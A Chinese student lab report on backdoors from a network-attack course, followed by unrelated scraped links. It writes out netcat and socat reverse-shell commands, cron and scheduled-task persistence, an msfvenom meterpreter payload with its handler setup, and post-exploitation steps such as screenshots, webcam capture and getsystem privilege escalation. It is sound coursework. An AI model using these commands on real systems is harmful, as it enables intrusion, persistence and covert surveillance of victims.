一、基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式

答:在莫名其妙的网站下载某些莫名奇妙的播放器。

2.例举你知道的后门如何启动起来(win及linux)的方式?

答:对于windows是双击后门软件执行。对于linux,通过cron指令。

3.Meterpreter有哪些给你映像深刻的功能?

答:截屏功能,录音功能,调用摄像头的功能。

4.如何发现自己有系统有没有被安装后门?

答:使用某管家查杀一下就好。

二、使用netcat获取主机操作Shell,cron启动

1.windows获得linux的权限

(1)查阅本机windows ip地址

可知win的ip为192.168.1.157

(2)使用以下代码ncat.exe -l -p 4310 监听4310端口,等着linux链接这个端口

(3)使用命令 nc 192.168.1.157 4310 -e /bin/sh 让linux链接4310端口  

(4)windows获得linux的shell

2.linux获得windows的权限

(1)查阅本机linux ip地址

(2)nc设置监听本地4310端口 nc -l -p 4310

(3)让windows去链接linux的4310端口

(4)linux获得windows的权限

3.nc数据传输

(1)windows监听本地4310端口 ncat.exe -l 4310  linux连接这个端口 nc 192.168.28.157 4310

4.nc定时启动

(1)windows监听本地4310端口 ncat.exe -l -p 4310

(2)crontab指令增加一条定时任务,让他在每小时的第54分钟执行 crontab -e 。

三、使用socat获取主机操作Shell, 任务计划启动

(1)按照步骤创建一个新任务,控制面板->系统和安全->管理工具->任务计划程序,在操作选项(菜单栏)中,选择“创建任务”,填写任务名称ZHYY,之后,新建触发器,选择开始任务时间为:工作站锁定时。

(2)创建完成之后,按 Win+L 快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行(可能会有很多同学出现一个黑屏,这里不用管它)

(3)在终端输入指令 socat - tcp:192.168.1.157:4310  此时可发现已经成功获得了一个windows shell

四、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.用以下代码生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=43101 -f exe > 007_backdoor.exe

2.通过nc指令将生成的后门程序传送到Windows主机上,输入后需要在Linux上输入指令ncat -nv

可以在C盘中看到该后门

3.在kali上使用 msfconsole 指令进入msf控制台,然后出现了下面这个奇怪的东西

4.配置参数攻击windows,这里需要把防火墙和杀毒软件全部关掉

(1)先按照以下代码进行配置

use exploit/multi/handler             

set payload windows/meterpreter/reverse_tcp   

show options                    

set LHOST 192.168.31.128              

set LPORT                     

show options                    

exploit                      

发现端口是4444

(2)设置模块、载荷

(3)再次设置主机IP、端口,并再次用 show options 查看是否设置正确,发现设置正确

(4)启用模块

(5)在windows上运行后门程序,并在linux上查看,发现得到了windows远程控制权

五、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.直接输入命令 screenshot 进行截屏,发现截屏记录在root下

2.使用命令webcam_snap进行控制摄像头

3.进行提权

(1)先使用 先使用 getuid 再使用 用 getsystem 指令进行提权

(2)以管理员身份运行后门程序

(3)提权成功

六、实验感想

通过本次实验了解了后门植入原理和如何通过后门去控制其他主机,原理比较简单,也可以想得明白,因为是原理所以和实际操作会有偏差,因为被攻击的电脑有杀软和防火墙,不可能这么容易就被植入后门程序。与此同时也学到了控制权限之后能对受害主机进行的一系列操作,其中印象最深刻的就是控制截屏功能和摄像头的权限,希望在之后的课程中能够进一步地学习后门植入程序,也就是如何才能让后门程序逃过杀毒软件的查杀,或许这是计算机病毒里才可能讲到的内容了。

20164310Exp2后门原理与实践的更多相关文章

  1. 20165223《网络对抗技术》Exp2 后门原理与实践

    目录 -- 后门原理与实践 后门原理与实践说明 实验任务 基础知识问答 常用后门工具 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shel ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  4. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  5. 2018-2019-2 20165234 《网络对抗技术》 Exp2 后门原理与实践

    实验二 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其 ...

  6. 20165221 《网络对抗技术》EXP2:后门原理与实践

    20165221 <网络对抗技术>EXP2:后门原理与实践 实验任务 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  9. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

随机推荐

  1. BUAAOO P5-P7 Elevator Simulation

    目录 Abstract Introduction Topic Request Elevator Analysis Reading Requests Coordinating Scheduling an ...

  2. windows 10安装docker一直挂起在Installing Components and Removing Files

    碰到这个问题百度了好久都没有找到解决方式,什么用管理员方式运行,给文件夹权限啊,都不好使. 后面在bing上面搜docker install compoents关键字找到一条结果,如下如 点进链接,内 ...

  3. div嵌套,常见左右分类栏目

    最终效果图如下: html代码如下: <div class="smalItem"> <div class="leftnav"> < ...

  4. git特殊命令

    1.git追踪远程分支,该命令使用Tab不会自动补全 git branch --set-upstream-to=远程分支名(origin/xxx) 2.从远程分支创建本地新分支 git checkou ...

  5. 1077 Eight

    Eight Time Limit: 1000MS   Memory Limit: 65536K Total Submissions: 37738   Accepted: 15932   Special ...

  6. java clone()

    Java中对象的创建   clone顾名思义就是复制, 在Java语言中, clone方法被对象调用,所以会复制对象.所谓的复制对象,首先要分配一个和源对象同样大小的空间,在这个空间中创建一个新的对象 ...

  7. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

  8. 2018-2019-2 网络对抗技术 20165228 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165228 Exp4 恶意代码分析 1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操作有哪 ...

  9. 商品规格,自定义SKU类型

    <html> <head> <script type="text/javascript" src="http://xoxco.com/exa ...

  10. cmd中运行maven -v提示JAVA_HOME的配置问题解决办法

    问题描述: 在安装maven之后,输入:mvn --version进行查询,结果是: The JAVA_HOME environment variable is not defined correct ...